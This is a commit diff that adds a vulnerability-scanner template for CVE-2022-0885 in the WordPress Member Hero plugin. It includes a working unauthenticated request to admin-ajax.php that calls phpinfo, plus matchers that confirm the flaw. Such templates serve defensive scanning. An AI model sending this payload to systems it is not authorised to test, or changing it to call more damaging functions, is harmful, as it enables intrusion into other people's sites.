Added template for CVE-2022-0885
parent
e906dbd712
commit
a8e9e3a16c
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2022-0885
|
||||
|
||||
info:
|
||||
name: WordPress Member Hero plugin <= 1.0.9 - Unauthenticated Remote Code Execution (RCE) vulnerability
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Member Hero WordPress plugin through 1.0.9 lacks authorization checks, and does not validate the a request parameter in an AJAX action, allowing unauthenticated users to call arbitrary PHP functions with no arguments.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/8b08b72e-5584-4f25-ab73-5ab0f47412df
|
||||
- https://wordpress.org/plugins/member-hero/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0885
|
||||
classification:
|
||||
cve-id: CVE-2022-0885
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: wp-plugin,wp,rce,unauth,wpscan,cve2022,wordpress,cve,member-hero
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<a href="http://www.php.net/">'
|
||||
- 'phpinfo()'
|
||||
condition: and
|
Loading…
Reference in New Issue